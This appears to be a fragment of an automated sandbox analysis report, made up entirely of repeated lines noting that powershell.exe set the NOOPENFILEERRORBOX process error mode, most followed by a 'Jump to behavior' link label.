                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
